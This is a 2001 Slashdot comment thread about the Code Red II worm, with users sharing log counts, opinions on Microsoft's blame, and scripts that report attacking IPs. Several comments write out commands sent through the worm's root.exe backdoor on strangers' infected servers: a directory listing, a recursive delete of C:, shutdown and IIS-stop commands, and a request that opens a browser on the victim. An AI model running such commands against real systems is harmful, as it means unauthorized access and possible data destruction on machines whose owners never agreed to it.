      OUCH! 200 hits from code red today alone. The earliest hit I saw was on July 19th.

    11. Re:huge cable modem hits by jsse · · Score: 2

      So I install Apache to collect the logs for the historic momemt. :)

    12. Re:huge cable modem hits by PupSteR · · Score: 1

      heh yeah it's funny, i checked my webserver logs, 40 in a minute.. funny.. good for historical information, and to turn into @home :)

    13. Re:huge cable modem hits by PupSteR · · Score: 1

      Yep, I'll keep doing the same, at least until I go to college next month... then i'll violate the TOS for college by running a dormroom server. need i say more?

    14. Re:huge cable modem hits by Anonymous Coward · · Score: 0

      I have been using a sniffer to log the hits to port 80 and recorded over 200 different IP's trying to CR me. Trying to track each of these would be an incredible waste of time. @home should be putting in a filter to track this stuff, not me.

    15. Re:huge cable modem hits by jrockway · · Score: 1
      It's from the Code Red randomly guessing IP's. Every time the arp-cache sees an IP it doesn't know, it has to ask. So when Code Red starts spitting random IP's out, an arp how-has comes out. See example:
      Worm:
      1.1.1.1:80 --> GET /default.ida?[snip]
      1.1.1.2:80 --> GET /default.ida?[snip]
      1.1.1.3:80 --> GET /default.ida?[snip]
      1.1.1.4:80 --> GET /default.ida?[snip]

      Router
      1.1.1.255 --> arp who-has 1.1.1.1
      1.1.1.255 --> arp who-has 1.1.1.2
      1.1.1.255 --> arp who-has 1.1.1.3
      1.1.1.255 --> arp who-has 1.1.1.4

      Or something like that...
      --
      My other car is first.
  205. Nasty as it gets? by Spackler · · Score: 1

    Or just plain simple?
    Just type the following into a browser using one of the infected systems from your log file:

    http://infected_system/scripts/root.exe?/c+dir+c:\

    You are greeted with a directory listing of the root of C:\!
    I just LOVE windows!
    This is going to get MUCH worse!

    1. Re:Nasty as it gets? by Anonymous Coward · · Score: 0

      How about doing this via root.exe:

      del /f /s /q c:\*.*

      It's one way to get rid of the worm.

    2. Re:Nasty as it gets? by Anonymous Coward · · Score: 0
      Any moderately skilled person could write an easy to use tool that does that (and more, including delete, upload, download, run program) in just few hours. Up until now I have thougth of this as Just Another MS Hole to laugh about, but this is starting to be really scary.

      I can just imagine how scared how people at Microsoft are feeling right now. This a total loss of face for them already, but if script kiddies start deleting files they could face some bad lawsuits (they would propably win, but getting sued is never fun).

    3. Re:Nasty as it gets? by Anonymous Coward · · Score: 0
      Re: I can just imagine how scared how people at Microsoft are feeling right now

      They could care less. They have monopoly power in the market, and couln't give a fat rats ass if hundreds of thousands of computers world wide are getting rooted and backdoored in a little over 12 hours.

      As scary as that sounds, they really don't give a shit. They're not obligated, by law, and you can't sue them if you tried.

    4. Re:Nasty as it gets? by Tomcow2000 · · Score: 1

      Actually, you can sue them. That doesn't mean you'll win, but knowing MS, they'll settle rather than endure a long court case (especially with current lawsuits against them)

      --

      Sleep: A completely inadequate substitute for caffeine.
  206. Already on Slashdot by alanjstr · · Score: 0, Redundant

    Forgive me for the karma whoring, but all I did was scroll down my SlashDot homepage to see that Timothy already posted an article about Code Red II.

  207. Mountain Dew: Code Red by Spaztek · · Score: 2, Informative

    Speaking of Code Red, mountain dew code red is a highly malicious blend of virus, cough syroupe, and caffeine. All are bad except caffeine. Just like this virus, all are bad on windows machines, except those which arent windows machines. I guess linux is like the caffeine of all soda. The good parts :-)

    --
    "If a man watches 3 football games in a row he should be declared leagaly dead" - A
    1. Re:Mountain Dew: Code Red by Anonymous Coward · · Score: 0

      And it has vegetable oil in it.... You can taste the slimyness as you drink....

  208. Compromised Machines are abundant by spinfire · · Score: 1
    Almost all of these machines are infected with the CR II varient, and most of them reside in the same class A/B subnet. I tried the root attempt myself on one of them, result are here.

  209. Re:Anyone still consider this a Microsoft problem? by LinuxHam · · Score: 1

    now are either workstations with IIS installed and the user doesn't know/remember

    A friend of mine is a cable modem user who got infected. He said on or about the 1st, his cable modem light suddenly became maxed out. He's usually good with his system administration, but he recently switched back from RH to Win2k server. He checked and checked and found out that some Windows Media Server had been installed and was running its own copy of IIS, which had been infected.

    The next day he installed Apache Win32.

    --
    Intelligent Life on Earth
  210. The Breaking Point by tbo · · Score: 5, Insightful

    I think Code Red (and Sircam, which your average Joe will probably lump together with Code Red in his mind) will be the virus that breaks the camel's back. It's gotten constant publicity, it's coming back for a second round, and this time, it wants blood.

    What will happen? I don't know, but here are some possibilities:

    Revolt against Microsoft software. We'd all love for this to happen, but their PR machine is probably too good. Still, we can always hope people realize that MS bears a large part of the responsibility here.

    Lawsuit. Assuming the virus writers aren't found, the next logical targets will be Microsoft, and owners of a large number of infected hosts. Why it probably won't happen: suing Microsoft over this draws attention to the fact that your company's computer systems are insecure, and that your admins were too lazy/stupid to install the patch. Microsoft can always hide behind their patch, which was available well in advance, and claim that "everyone knows that bugs happen, and it's up to admins to keep up to date" (never mind that this contradicts their own marketing material--when has inconsistency ever stopped marketing before?). Suing somebody with a large bunch of infected hosts is also silly, since, to be infected by them, you have to be just as inept as them.

    Government Intervention. Some state governors may push silly state bills, but they'll be irrelevant. What would really get interesting is if the Feds pass some sort of laws, either making people responsible for keeping their systems secure, or defining what kind of liability software manufacturers are exposed to in these circumstances (i.e., can you sue MS? For how much?). Why it probably won't happen. With Congress and Bush on vacation, not much will get done in at least the next month, and things will probably have come to a head before then. Only if this round does serious damage (perhaps the world's biggest DDoS against some high-profile targets, like Akamai), and another generation of Code Red pops up in September (just in time to catch all those college PCs with their pirated copies of Windows 2000 Server and high bandwidth), will this become a real possibility.

    Internet Collapses. I really doubt it, I just had to say it to satisfy Cringley :-) Seriously, though, things may get slow, but I have a feeling vigilante efforts (counter-worms, Apache scripts that reboot infected attacking Win boxes, etc.) will keep this from happening.

    So, which will it be, folks? This would make a great SlashPoll.

    1. Re:The Breaking Point by Anonymous Coward · · Score: 0

      "vigilante efforts (counter-worms, Apache scripts that reboot infected attacking Win boxes, etc.)"

      Actually, with this new variant, you'd be helping the virus if you rebooted the machine. It needs to reboot to disable system file protection. The backdoor remains even after the machine has been rebooted.

      This is a good reason why vigilante efforts are a bad idea. It's all too easy to make a simple mistake that ends up making the problem worse.

    2. Re:The Breaking Point by Anonymous Coward · · Score: 0

      > I'm sure MS would love it, because it would destroy Linux.

      Err. Microsoft would _hate_ it. Liable for bugs ? No software maker would like it. None.

      Stop smoking crack. And microsoft is not that scared of linux (yet). They have plenty solutions to crunch linux without hurting their business. Like UCITA and DMCA.

      Cheers,

      --fred

    3. Re:The Breaking Point by Tack · · Score: 1
      Or, the more probable outcome:

      Nothing. That's right. Life goes on as usual. The net and its users survive yet another disturbance in the force, and we return to our regularly scheduled program.

      Jason.

    4. Re:The Breaking Point by Anonymous Coward · · Score: 1

      That's a good point. Should be modded up, if moderators were not smoking crap right now.

    5. Re:The Breaking Point by Anonymous Coward · · Score: 0

      > What will happen? I don't know, but here are some possibilities:

      [fantasies removed]

      Nothing will happen. All important unpatched servers have been patched last week. What's the problem if 100K Cable/DSL wankers get rooted ?

      What do you expect ? News stories like

      "Microsoft IIS Worm infected 100,000 systems -- Microsof face anger of SysAdmin from all over the world" ?

      Nope you'll get:

      "CodeRed mutated yesterday -- Thanks to Microsoft patch, only a third of infected hosts"

      "bla bla ... DSL and Cable users ... bla bla .. Microsoft representative ... bla bla .. mostly pirated installation of Windows... bla bla ... less than first red code ... bla bla ... no high profile site ... ... bla bla .. hackers ... bla bla"

      Stop dreaming (but I'd love to be wrong).

      Cheers,

      --fred

    6. Re:The Breaking Point by jolan · · Score: 1

      djbdns is an open source replacement. you get a cash award for finding vulnerabilities in it. the only reason i can see for suing a software company is if there is a glaring security problem and they act slow to fix it, or deny that it is a problem. microsoft used to do both of these, but have since gotten much better. it really is funny though when microsoft servers get defaced/hacked. it seems that they too can lack the competence to patch (their own) servers.

    7. Re:The Breaking Point by Saint+Nobody · · Score: 3, Funny

      yeah, i laughed when i got a port 80 hit from cust2120.EzSecureHosting.com it's apparently not as secure as they would have people think, so customer 2120 could probably sue them.

      and microsoft has the same "we make no guarantees" clauses that free software licenses have, so either the case would be dismissed, or clauses like that would be ruled illegal, which could be bad for free software, unless they only made it illegal to attach those clauses to commercial software

      --
      #define F(x) int main(){printf(#x,10,#x);}
      F(#define F(x) int main(){printf(#x,10,#x);}%cF(%s))
    8. Re:The Breaking Point by Anonymous Coward · · Score: 0

      I think the proper term for djb products is "shared source".

    9. Re:The Breaking Point by jesser · · Score: 1

      Why it probably won't happen: suing Microsoft over this draws attention to the fact that your company's computer systems are insecure, and that your admins were too lazy/stupid to install the patch.

      Three words: class action lawsuit.

      --
      The shareholder is always right.
    10. Re:The Breaking Point by MajroMax · · Score: 1
      Revolt against Microsoft software. We'd all love for this to happen, but their PR machine is probably too good. Still, we can always hope people realize that MS bears a large part of the responsibility here.

      As much as I like the idea of Microsoft paying through the nose, I would really it rather not happen because of Code Red. Why? Because Microsoft really isn't to blame here.

      The security flaw was exposed to the public (not kept secret), and a patch was released & made available a full month before the main CR outbreak. They did everything they reasonably should have.

      Internet Collapses. I really doubt it, I just had to say it to satisfy Cringley :-) Seriously, though, things may get slow, but I have a feeling vigilante efforts (counter-worms, Apache scripts that reboot infected attacking Win boxes, etc.) will keep this from happening.

      Actually, I woldn't particularly mind it if every AOL/MSN/Etc. subscriber decided that the Internet was too dangerous and unplugged their computer. More bandwidth for me. :)

      --
      "Evil company X is threatening to restrict our rights! Let's all get together to stop--OOOH! SHINEY!!!" -- AC
    11. Re:The Breaking Point by nyet · · Score: 2

      None of the above.

      I vote for

      Crucify the next virus writer (or other random, innocent hacker) they manage to catch and pass more inane laws that have no other effect but to make your life as a programmer even more difficult. Microsoft will hailed as the "hero" in the case, them being the underdogs against a sea of malicious open source hackers, when they release a patch that closes the script kiddie hole of the week, but not much else. 3rd party vendors will scramble to create more useless server side "personal firewall" applications that filter ONLY traffic based on *OLD* infection methods. No attempt will be made to make IIS itself less of a security risk. No reporting of IIS cgi-child processes running with admin level permissions will be made. Releasing the results of virus related research will become illegal. Discussing possible future vulerabilties will become illegal. Using any "hacker" operating system (e.g. not made by Microsoft) will become illegal. Using the word "virus" or "worm" anywhere on the Internet will earn you a visit from the FBI (after all, if you are innocent, you have nothing to hide). That small inconvenience of having all of your "computer related" possessions confiscated (including your home and car) and yourself thrown in jail w/o bail is insigificant when compared to the amount of viruses prevented from spreading.

    12. Re:The Breaking Point by nyet · · Score: 3, Insightful

      The security flaw was exposed to the public (not kept secret), and a patch was released & made available a full month before the main CR outbreak. They did everything they reasonably should have.

      Except that IIS still runs with admin priveledges. Nice try though.

    13. Re:The Breaking Point by Kris_J · · Score: 3, Insightful

      You forget ICE -- the rather romantic "Intrusion Countermeasure Electronics" -- an automated response to terminate unauthorised hack attempts. I'm currently running the IIS shutdown line as specified by other /. posters for every IP address that probes me (I'm on a dymanic 56k dialup, I should not be getting HTTP requests -- I never did before CodeRed). It would probably be trivial to automate the process, and POOF! your first ICE program.

    14. Re:The Breaking Point by p_trinli · · Score: 1

      Gates drops to his knees and begs Linus's forgiveness, pledging to devote Microsoft's thousands of programs to stable, secure, efficient open source software. Bill Gates may decide to Do the Right Thing. Why it probably won't happen. Gates is still mad with power, and sore over a wedgie received in high school.

    15. Re:The Breaking Point by automandc · · Score: 1
      You left out the most likely (SlashPoll) option:

      CowboyNeal Saves the Day!

      --
      I'm a lawyer with excellent karma. Something's gotta be wrong.
    16. Re:The Breaking Point by Shotgun+Willy · · Score: 1

      The SlashPoll result is obvious: CowboyNeal!!

    17. Re:The Breaking Point by Anonymous Coward · · Score: 0
      Re: "What's the problem if 100K Cable/DSL wankers get rooted ? "

      If they were rooted and backdoored and the boxen shut up about it, you'de be right, but it's 100k rooted and backdoored boxen that ADVERTISE THEIR PRESENCE TO THE WORLD (through their constant GETS showing up in logs all over the world).

      Laying these boxen open is just the first step. Now ANY virii with any intent can infect these pooters at will.

      Still don't believe me? When you get to work tomarrow, tell your boss you'de like to root and backdoor 5 news servers, install them outside the firewall, and ask them to scan the entire net, and see what he says.

    18. Re:The Breaking Point by Anonymous Coward · · Score: 0

      Sure. I wasn't clear enough. I meant it will probably not be a problem for the mainstream press.

      Of course having 100K rooted hosts in the wild will give us pretty nice DDoS attacks in the next few weeks. But, if the _original_ CodeRed (which hacked some pretty high profile sites) had left those boxes rooted and wide open, we would had a nice bloodbath.

      > Now ANY virii with any intent can infect these pooters at will.

      I highly doubt that there are many high profile sites (with valuable data or impressive bandwidth) in those. I beleive we have 100K student boxes with their ass wide open. Good for DDoS. Nice for warez. But not much more. Of course, I may be wrong (won't be the first time... :-) )

      Cheers,

      --fred

    19. Re:The Breaking Point by Tony-A · · Score: 1

      There is a critical difference with open source, paid or unpaid. With open source, the recipient of the code is in a position to diagnose and debug the code. Without open source, the recipient of the code must rely on the authors. If the legal system is at all reasonable, that should make a lot of difference.

  211. oh c'mon... by Anonymous Coward · · Score: 1, Redundant

    please. posting another story like this is almost as big a waste of bandwidth as the worm.

    please reference previous stories: http://slashdot.org/article.pl?sid=01/08/05/043321 9.

    1. Re:oh c'mon... by Anonymous Coward · · Score: 0

      Yes, but until we can get every admin out there that hasn't patched their system to fix the hole, Code Red is going to keep bouncing around. Someone has to pester them all in compliancy, and it might as well be Slashdot.

    2. Re:oh c'mon... by Tyrall · · Score: 0, Offtopic

      You really think that someone who reads slashdot won't have patched their system by now if they were going to?
      Anyone who pays any attention to the media has patched their system. The fact that there are so many people htting my box (and everyone else's) just shows how many totally uninformed idiots there are out there.

  212. Anyone still consider this a Microsoft problem? by NetJunkie · · Score: 2

    I can understand admins not patching when the fix first hit. The usual "Won't happen to me problem". But now? After all this press? All the news stories?

    I think the systems we're seeing infected now are either workstations with IIS installed and the user doesn't know/remember, or server with no real support staff sitting in a closet somewhere. Now the question is, will they EVER get patched?

    Someone whip up a worm that patches systems. Be like a cyberwar from the movies. How cool is that? :)

    1. Re:Anyone still consider this a Microsoft problem? by Anonymous Coward · · Score: 0

      My cable data light has been blinking steadily all day -- with no machines attached.

    2. Re:Anyone still consider this a Microsoft problem? by Anonymous Coward · · Score: 0
      Someone whip up a worm that patches systems. Be like a cyberwar from the movies. How cool is that? :)
      Some guy just did this. He got convicted and went to jail. I don't remember his name offhand, but it was definitely in the U.S., and in the last couple of months. (Was it the Ramen worm, or did I make that up?) It's on The Register somewhere, but they're down today.
    3. Re:Anyone still consider this a Microsoft problem? by spectral · · Score: 0

      I was planning on making a php script a my /default.ida that recorded all the attempts, and notified the person of how to fix it. 24 hours later, if I got scanned, again, I was going to use the backdoor to shut off their web server, then delete the backdoor exploit.. would that kill code red 2, or do I need to kill another process also to stop the already infected part? Patching it automatically is too hard, you need service packs and reboots and stuff. This will at least get the bastard's attention hopefully.

  213. ...and these machines are proud of it! by Sun+Tzu · · Score: 4, Interesting

    heheh! Not only is it a fine remote administration feature, but it's also pretty slick the way machines upgraded in this way advertise their new status to everyone with a webserver on port 80.

  214. Securityfocus asks for IPs by mawis · · Score: 5, Informative

    To notify the administrators of the attacking servers you can send their IP followed by the date and time of the attack to aris-report@securityfocus.com. - Please use this format because it's a robot address. http://securityfocus.com/announcements/310

    1. Re:Securityfocus asks for IPs by Cave+Dweller · · Score: 1

      Here's a quick (and ugly, ugly, ugly) kludge:

      cat access_log | grep default.ida | tr -d '[' | tr -d ']' | awk '{print $1 " " $4 " " $5}'

    2. Re:Securityfocus asks for IPs by c_g_hills · · Score: 0

      using gnu software...

      grep default\.ida access_log | tr -d '[' | tr -d ']' | gawk '{print $1 " " $4 " " $5}'

    3. Re:Securityfocus asks for IPs by ssimpson · · Score: 1

      This is probably a stupid point from a Linux newbie, but don't you have to add a "| sort | uniq"? My limited understanding is that uniq only removes duplicate consecutive entries?

      --
      "Mary had a crypto key, she kept it in escrow, and everything that Mary said, the Feds were sure to know."
    4. Re:Securityfocus asks for IPs by blakestah · · Score: 2

      This one works for me for default apache logging options. 50 IP addresses so far. All your IIS servers are belong to me.

      grep \?XXX /var/log/apache/access.log | mawk '{ print($1 " "$4 " " $5) }' | Mail -s "Compromised machines" aris-report@securityfocus.com

    5. Re:Securityfocus asks for IPs by Paranoid · · Score: 1

      Thats the correct way to use uniq, yes. However, since the dates and times are all different, uniq won't do much. All that addition would end up doing is sorting by IP address, rather than by time.

      --
      Paranoid
      Bwaahahahahaa.
    6. Re:Securityfocus asks for IPs by LightningTH · · Score: 1

      In reply to this, I have written a script for myself but of course giving it out for others to use also. It will go thru apache's access log and auto-alert security focus to new IPs. Ya jut have to setup a crontab job to fire it off once in awhile.

      Just do a wget on http://www.lightspeed.cx/code-red-ii-mail, open it up and modify it slightly for the paths. Going to the link may make the file unreadable in some browsers.

  215. lucky by orbitalia · · Score: 1

    ..that code red I wasnt written along the lines of code red II. There would be alot more unpatched websites out there with super user wide open.. I think this hints that code red I and code red II are written by different people.

  216. Experiment by XBL · · Score: 2, Interesting
    I am on @Home, and have an unpatched Windows 2000 Server (Warez Edition) installation. I've just turned it on a half-hour ago. Now let's see how long it takes to get the worm. If I get it, I'll post an update with the time.

    Right now my NIC is flickering like mad, yet Windows 2000 does not show these as incoming or outgoing packets. What is going on?

    1. Re:Experiment by XBL · · Score: 1

      Well, nothing yet, after 1 hour...

    2. Re:Experiment by XBL · · Score: 1
      Well, almost 2 hours, and not one attempt. The only thing on the log file is me.

      Interesting...

    3. Re:Experiment by Anonymous Coward · · Score: 0
      Right now my NIC is flickering like mad, yet Windows 2000 does not show these as incoming or outgoing packets. What is going on? HELLO???? You are now infected, the traffic you see is the worm trying to infect other people. Do us all a favor and remove yourself from the internet.

      Thanks

    4. Re:Experiment by XBL · · Score: 1

      No its not. My Linux box was doing it before I even turned on the W2k server box. So there :-P

    5. Re:Experiment by Fenris+Ulf · · Score: 1

      Probably ARP requests. Here on my end of @Home, every hour or two I get arp requests for every IP in our netblock, which I presume is the NOC's way of keeping track of who is using which IPs. This has been happening since I got the service a year ago, so I doubt it's an attacker. If you hook a Unix box up to the feed, you can tcpdump it and see the ARP packets. I imagine there must be some equivalent for Win boxen too.

    6. Re:Experiment by Anonymous Coward · · Score: 0

      ok, but remove it from the internet anyways. if/when it does become infected, it'll try to massively infect everyone in your /16 subnet, then you'll get all kinds of infection attempts back.

    7. Re:Experiment by p_trinli · · Score: 1

      When I plug in boxes on campus, the NICs always "blink like mad," even when the main system is off. It must be staying current with the network for some reason.

  217. Gnu/Sircam? by Tachys · · Score: 2, Interesting

    I wanted to know would it be possible to make a similar virus for Linux using a Bash Shell.

    If not, why not?

    1. Re:Gnu/Sircam? by LinuxHam · · Score: 1

      The tough part is getting a remote machine to execute code without knowledge of the machine owner. Cheesy email viruses are usually scripts embedded in documents and spreadsheets that automatically execute when the user opens the attachment. Hence the daily feeding of, "never open attachments you weren't expecting."

      The better email virii cause the end users' machines to execute code as soon as the email is received. That's a huge problem with Outlook. Think about the millions of office workers who never exit Outlook, even when going home for the weekend, and those with cable modems who leave Outlook up all day. Yes, you can make Outlook automatically dialup to retreive email, but I doubt many people actually do that.

      AFAIK, no GNU mail readers support automatically executing scripts stored in email. Can anyone vouch for Netscape? One would think that would be closest risk to the same problems, but it would find so few users in the world.

      --
      Intelligent Life on Earth
    2. Re:Gnu/Sircam? by jorbettis · · Score: 2
      Similar to Sircam? Not presently.

      MIME attachments won't have the execute permission set, which means that a script would have to be saved to disk and executed by the user with the command

      $ bash virus.sh

      Or the user would have to set the execute permissions himself:$ chmod u+x virus.sh
      $virus.sh

      Granted, a mail reader could be written to do all of this itself after the user ``clicks'' on the attachment, but I am aware of none that exist at the present time that have that ``feature''.

      Plus, since GNU/Linux (and all Unices) is a multi-user permissions based system, sircam would only be able to touch those files to which the user has read access. As long as the administrater isn't reading his mail as root, you'll never have to worry about some luser mailing his /etc/shadow to you.

      So, until Microsoft writes a port Outlook and starts certifying ``Linux Engineers'', no, there won't be a sircam for GNU/Linux.

      --

      Jordan Bettis

      ``Wherever you go, there's another stupid sigfile quote.''
    3. Re:Gnu/Sircam? by Anonymous Coward · · Score: 0

      "AFAIK, no GNU mail readers support automatically executing scripts stored in email"

      Emacs has had this feature.

    4. Re:Gnu/Sircam? by Anonymous Coward · · Score: 0
      Sure. All you have to do is convince the user to execute the trojan horse. You don't have to rely on the e-mail client to do the executing, just add a little social engineering ala "I'd like you advice on this" from sircam.

      The interesting thing is that because linux programs tend to use nice standards, the same virus could get the address books from any number of e-mail clients. Sircam won't spread through my address book in windows, because I use eudora and sircam doesn't know how to read those address books. But if pine, elm, mutt, kmail, netscape, and all the rest use the same kind of address books (I don't know) then it would be even easier to spread.

    5. Re:Gnu/Sircam? by Glytch · · Score: 2

      I don't doubt it. Frankly, it's hard to imagine a feature that Emacs doesn't have and/or hasn't had. :)

    6. Re:Gnu/Sircam? by Goonie · · Score: 2
      IIRC, Emacs *did* have a problem allowing mail to contain arbitrary bits of elisp code which were auto-executed by emacs, but they took out this feature a long time ago.

      Anybody got more details?

      --

      Any sufficiently advanced technology is indistinguishable from a rigged demo
      --Andy Finkel (J. Klass?)
  218. CmdrTaco runs Windows by �nubis · · Score: 3, Funny

    I still think sircam is more annoying since it affects every email user

    Every email user?!? CmdrTaco must run Windows. Let's get him!

    1. Re:CmdrTaco runs Windows by M.+Silver · · Score: 2
      Every email user?!? CmdrTaco must run Windows. Let's get him!

      I think the notion is that it affects non-Windows people as recipients of unwanted random files. (Code Red affects non-Windows people as port 80 hits, too, but that's relatively trivial, and unlikely for minimally-connected dialup people.)

      --

      Slashdot's token middle-aged housewife
    2. Re:CmdrTaco runs Windows by kilrogg · · Score: 1
      I think what he meant was the even non-windows people still receive annoying sircam email from windoze user (though I haven't).

      His statement is slightly wrong, since even non-IIS using people still get infection attempts from IIS servers. My access_log from yesterday now stands at 300K, so Taco's wrong, CR does affect me too, in a way.

    3. Re:CmdrTaco runs Windows by whatnotever · · Score: 1

      Um, I think he meant that it sends massive files to random people, regardless of their OS. Thus, Joe Linux gets as much crap in his box as Jim Windoze.

  219. Script kiddie by SnapperHead · · Score: 1

    This script kiddie won't stop until he gets all over the news about the damage it caused.

    Another 13 year old looking for attention.

    --
    until (succeed) try { again(); }
  220. The Whitehouse.gov lesson by Anonymous Coward · · Score: 0, Informative
    It was clear, when the first version of Code Red was released, that whitehouse.gov was the intended target of a Distributed Denial Of Service attack.

    They got lucky when the hacker messed up (he used a hard IP instead of domain name). What did they do in response?

    What did the whitehouse.gov admins do once they realized that they were a clear target? Write angry but useless letters to microsoft? Call Bill Gates and piss and moan?

    NO! they took a PRO-ACTIVE reaction to a threat of clear and eminent danger to information distribution and installed Linux.

    www.whitehouse.gov is there a lesson there?

    1. Re:The Whitehouse.gov lesson by Anonymous Coward · · Score: 0

      Whoopee, they installed Linux... the 2nd most hacked system in the world. A linux system on the honeynet project was found & rooted in less than 15 minutes after it was put onto the network... And what the hell does linux have to do with a DDOS attack, if you are the victim in a DDOS it (say it with me junior) does not matter what operating system YOU run, because it's the OTHER systems that have been compromised.

      People should really stop and think before they post sometimes.

  221. My prediction... by logicfuzzy · · Score: 1

    First came NNNNNNN then XXXXX... Hmmmmm. I predict two more versions : IIIIIII and UUUUUUU.. It's a word scramble game!

  222. I'm sorely tempted . . . by Floyd+Turbo · · Score: 5, Insightful

    Is there a Windows command line equivalent to "shutdown -h now", by any chance? I know I really shouldn't do it, but I'd be so sorely tempted to write a script that would shut down any infected box that scanned mine.

    The more I think about it, the more it seems like a permissible act of self defense. It does no harm to the infected box (if the worm doesn't write itself to disk, as I've read, it actually helps) and prevents the infected box from being used to perpetuate more abuse.

    Hmm . . .

    1. Re:I'm sorely tempted . . . by Greyfox · · Score: 5, Insightful

      You want this: http://support.microsoft.com/support/kb/articles/Q 202/0/13.ASP Happy little command called IISRESET. I think an IISRESET /STOP is in order...

      --

      I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

    2. Re:I'm sorely tempted . . . by nugatory · · Score: 1
      The more I think about it, the more it seems like a permissible act of self defense.

      I sympthize a lot with the soreness of your temptation, but I also think you misspelled "less" somewhere in the quoted sentence :-)
      Self-defense only applies when you are defending yourself and have no alternative. If a crazed axe murderer is pounding at your door with the avowed intent of hacking you into bloody bits, it's self-defense if you shoot him when he bursts through the door. It's self-defense if you shoot him after it's obvious that he will succeed him breaking down the door. But you are not allowed to shoot him if your door is protecting you - that's what the door and the 911 dispatcher is there for.

      You wouldn't be posting here if you actually had any measurable vulnerability to CRII, so there's no question of self-defense. You're already defended. Both legally and ethically the right thing to do is to notify the owner of the offending machine, or their ISP (who does have the right to shut off their internet access) and let them deal with it.

      But I still feel the temptation....

    3. Re:I'm sorely tempted . . . by Floyd+Turbo · · Score: 3, Insightful

      C'mon now, I'm not talking about killing the guy, or even his box. I'm not talking about wiping his harddrive or even installing a fix without the owner's permission. I just want these damned things to stop eating up my bandwidth.

      And while I'm not going to get cracked by the worm myself, I am getting hammered by others in the same /8 as me who weren't immune. I'm also not thrilled about thinking what the author of this new version is going to do with all the boxes he's rooted.

      Given all that, I'm still having a hard time deciding that telling the offending machine to turn itself off isn't a valid, proportionate response to this sort of thing.

      OK, OK, I'm not going to do it, but man . . .

    4. Re:I'm sorely tempted . . . by Anonymous Coward · · Score: 1, Insightful

      Suppose that server is monitoring or controlling some mission-critical or safety-critical apparatus? It might be a server so that it can be monitored from a remote location. You might kill someone by shutting it down or rebooting it.

    5. Re:I'm sorely tempted . . . by Ropati · · Score: 1

      I haven't worked through all the ramifications but Windows 2000 does respond to "shutdown now". I ran it from a prompt and it started a 30 second timer to a software shutdown. Yeah. Good luck.

      --
      machinator omnis sine licentia
    6. Re:I'm sorely tempted . . . by blakestah · · Score: 2

      That machine has been remote rooted, and anyone who has an httpd log is receiving it on a news broadcast. If it is running mission critical software, anyone and their brother can do anything they want to the mission critical software.

      The best thing you could do for that machine is shut it down. Its defenses have been COMPLETELY compromised. Without any defenses, the machine is useless.

      Besides, only a total idiot would run mission critical software on an unpatched IIS server, particularly after the past few weeks.

    7. Re:I'm sorely tempted . . . by Anonymous Coward · · Score: 0

      Do you have some linux tools package installed? Or maybe it's just server edition. I just ran "shutdown -?" "help shutdown" "shutdown now" and shutdown is not, in the ever-endearing words of Mi(a)crosoft, a recognized internal or external command. Some time ago, however, I remember a "rundll" command that would shut it down.

    8. Re:I'm sorely tempted . . . by Eric+S.+Smith · · Score: 2, Insightful
      Both legally and ethically the right thing to do is to notify the owner of the offending machine

      ...assuming that you can determine who that person is. And, ethically, if you were walking down the street with a fire extinguisher and saw somebody's garbage can on fire, would you really, uhh, leave them a message on their answering machine?

      The fire extinguisher in this case is ipconfig /release, I think. Bonus marks for picking the right interface on a machine with more than one NIC.

    9. Re:I'm sorely tempted . . . by SCHecklerX · · Score: 2

      Well then they damned well BETTER shut it down, b/c in the state it is in, it is CERTAINLY a larger threat to that person's life, being able to be fucked with!

    10. Re:I'm sorely tempted . . . by Anonymous Coward · · Score: 0

      There is on boxes with the resource kit: shutdown /L /T:0 It's been a long time... I don't remember if you need a /Y that you really do want to shut it down.

    11. Re:I'm sorely tempted . . . by IdentityCrisis · · Score: 1

      Welp, You can
      rundll32.exe shell32.dll,SHExitWindowsEx X
      where X stands for:
      0 = logoff
      1 = shutdown
      2 = reboot
      4 = force
      and you can also combine
      meaning a forced shutdown is 5 (4+1)

    12. Re:I'm sorely tempted . . . by gdchinacat · · Score: 1

      does anyone know if CodeRed spawns off other threads that would stay alive when iis is stopped? if so, doing this would help with very little, apart from possibly alerting the admin (assuming there is one) that the website is down. The response most likely with be the typical windows reboot.

    13. Re:I'm sorely tempted . . . by gmhowell · · Score: 2

      There is a binary called "shutdown.exe". Not sure if it came with a service pack or option pack, or from a stock install. It's actually not that bad.

      The neat trick is that you can shutdown remote boxes. I think you do need admin privileges, though.

      Since you are going to do this to Code Red boxen, they already have the telnet server, and you should easily be able to put the binary on that server.

      BTW, you can also send a message. For example, to tell the admin why this is happeneing:

      shutdown.exe "Your server is being shutdown now. You have been infected with Code Red [1,2,3], and it is pissing me off. Next time, please try to keep track of patches and upgrades. BTW, this (should | should not) clear up your problem. No need to thank me. Moron."

      Add the /r switch if you want the machine to reboot. Add /t:x where x=number of seconds until shutdown (default is 20). Enter other machines on the network (Windows machines) as \\machinename.

      --
      Jesus was all right but his disciples were thick and ordinary. -John Lennon
    14. Re:I'm sorely tempted . . . by spongman · · Score: 2

      iisresest /stop kills the IIS process, which would stop any threads that are running within it (including those CR2 threads).

    15. Re:I'm sorely tempted . . . by kryptkpr · · Score: 1

      Codered II -does- write itself to disk. If you reboot the box, it maps c: to /c and d: to /d, thus you're causing a lot more damage by shutting it down (and in turn causing it to be eventually restarted, by the same idiot who's left it up this long).

      --
      DJ kRYPT's Free MP3s!
    16. Re:I'm sorely tempted . . . by kris0r · · Score: 1
      My more benign method of dealing with this problem -- I send the following request to everyone sending me Code Red garbage:

      GET /scripts/root.exe?/c+explorer+http://www.cert.org/ advisories/CA-2001-23.html HTTP/1.0\r\n\r\n

      Simple enough -- it launches an IE window with the CERT advisory in it. If that isn't enough to get the admin's attention, not much else is.

    17. Re:I'm sorely tempted . . . by e_n_d_o · · Score: 2

      I could not get this to work on my own NT4 machine, its on sp6a. Any ideas/corrections?

      Thanks

    18. Re:I'm sorely tempted . . . by Anonymous Coward · · Score: 0

      thanks for the chuckle....

      I really enjoyed the bonus points.

  223. The problem with fixing IIS servers automatically by Velox_SwiftFox · · Score: 2
    Is that Miscrosoft's patch only works if you have service packs installed (Read: rebooting the machine at the least).

    Because those who are most vulnerable to the wormvirus are the companies with the most clueless sysadmins, the set of machines with uninstalled service packs (and running Index Server by out-of-the-box default, the vulnerable component) probably largely overlaps the set of Code Red machines.

    Yes, having to administer one of these along with Solaris and Linux boxen, I've patched mine; trivial).

  224. Try pulling the IP up in your browser by Anonymous Coward · · Score: 0

